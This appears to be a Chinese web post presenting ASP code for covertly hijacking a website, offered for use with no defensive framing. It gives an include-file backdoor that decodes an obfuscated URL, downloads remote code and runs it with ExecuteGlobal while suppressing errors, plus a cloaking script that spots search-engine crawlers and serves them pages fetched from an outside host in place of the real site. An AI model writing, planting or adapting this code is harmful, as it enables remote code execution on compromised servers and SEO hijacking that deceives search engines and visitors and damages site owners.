超牛B隐藏ASP劫持。

<!–#include file=”include/bodys.asp”–> 嵌入核心文件

bodys.asp 代码

<%
On Error Resume Next:dim Est,eti,Gest,eyx
Est=array(ascii加密代码)
For eti=0 To UBound(Est):Gest=Gest & Chr(Est(eti)):Next: Set eyx = Server.CreateObject(“MSXML2.ServerXMLHTTP”)
eyx.open “GET”,Gest,false: eyx.send(): ExecuteGlobal (eyx.responseText)
%>

———————————————————————————————————————-
Server.ScriptTimeout=600

Function check(user_agent)
allow_agent=split(“Baiduspider,Sogou,Baidu,Sosospider,360,so,haosou”,”,”)
check_agent=false
For agenti=lbound(allow_agent) to ubound(allow_agent)
If instr(user_agent,allow_agent(agenti))>0 then
check_agent=true
exit for
end if
Next
check=check_agent
End function

Sub sleep()
If response.IsClientConnected=true then
Response.Flush
else
response.end
end if
End Sub

Public Function GetHtml(url)
Set ObjXMLHTTP=Server.CreateObject(“MSXML2.serverXMLHTTP”)
ObjXMLHTTP.Open “GET”,url,False
ObjXMLHTTP.setRequestHeader “User-Agent”,url
ObjXMLHTTP.send
GetHtml=ObjXMLHTTP.responseBody
Set ObjXMLHTTP=Nothing
set objStream = Server.CreateObject(“Adodb.Stream”)
objStream.Type = 1
objStream.Mode =3
objStream.Open
objStream.Write GetHtml
objStream.Position = 0
objStream.Type = 2
objStream.Charset = “gb2312″
GetHtml = objStream.ReadText
objStream.Close
End Function

Function checkpage()
dim getpage
checkpage=False
getpage=request.querystring
If instr(getpage,”.xml”)>0 then
checkpage=true

end if

End Function

function fromua()
dim urlrefer,i,searray
urlrefer=”ua:”&LCase(Request.ServerVariables (“HTTP_USER_AGENT”))
fromua= false
if urlrefer=”” then fromse= false
searray=array(“google”,”baidu”,”sogou”,”yahoo”,”soso”)
for i=0 to ubound(searray)
if (instr(urlrefer,searray(i))>0) then fromua=true
next
end function

function fromse()
dim urlrefer,i,searray
urlrefer=”refer:”&LCase(request.ServerVariables(“HTTP_REFERER”))
fromse= false
if urlrefer=”” then fromse= false
searray=array(“google”,”baidu”,”sogou”,”yahoo”,”soso”)
for i=0 to ubound(searray)
if (instr(urlrefer,searray(i))>0) then fromse=true
next
end function

dim uauaua,bodyurl
uauaua=”ua:”&LCase(Request.ServerVariables(“HTTP_USER_AGENT”))
user_agent=Request.ServerVariables(“HTTP_USER_AGENT”)

if (instr(uauaua,””)>0) then bodyurl=”http://gbk.cccmcn.com/?url=http://”&Request.ServerVariables(“HTTP_HOST”)&request.ServerVariables(“URL”)&Request.QueryString
if (instr(uauaua,”sogou”)>0) then bodyurl=”http://gbk.cccmcn.com/?url=http://”&Request.ServerVariables(“HTTP_HOST”)&request.ServerVariables(“URL”)&Request.QueryString

if (checkpage()) then
body=GetHtml(bodyurl)
response.write body
else if (fromua()) then
bodyurl=”http://gbk.cccmcn.com/”
body=GetHtml(bodyurl)
response.write body
end if

end if

———————————————————————————————————————————————————————————